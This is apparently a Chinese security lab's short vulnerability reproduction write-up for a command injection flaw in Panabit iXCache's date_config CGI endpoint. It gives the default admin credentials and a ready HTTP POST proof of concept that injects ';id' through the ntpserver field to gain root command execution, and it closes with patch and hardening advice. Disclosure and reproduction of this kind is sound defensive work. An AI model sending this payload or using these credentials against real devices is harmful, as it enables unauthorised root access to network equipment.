Panabit智能应用网关远程代码执行漏洞

panabit是一款用于流量控制的实用软件工具，panabit缓存加速产品是一款基于派网公司自研的操作系统（PanaOS）上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点，可缓存丰富的资源，目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式，满足不同级别的用户需求。

panabit iXCache系统date_config存在命令执行漏洞，攻击者在获取Web权限的情况下，可通过构造payload进行远程命令注入，获取设备root权限。

0x02影响版本

影响版本SHANGHAI r3 [11.1]

0x03漏洞复现

1.访问漏洞环境

利用此漏洞需要高权限（默认账号admin 密码ixcache）

2.对漏洞进行复现

  Poc（POST）

POST /cgi-bin/Maintain/date_config HTTP/1.1Host: 127.0.0.1Cookie: pauser_1626709857_644740=paonline_admin_48217_16289319551;Path=/;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Content-Type: application/x-www-form-urlencodedContent-Length: 107
ntpserver=0.0.0.0;id&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1

POST请求，响应存在漏洞

        执行id命令，前端页面

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

该漏洞由于正常功能过滤不严格导致存在命令注入，并且需要高权限账号登录操作，建议修改登录密码为强口令，通过白名单控制访问源地址。

https://www.panabit.com

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来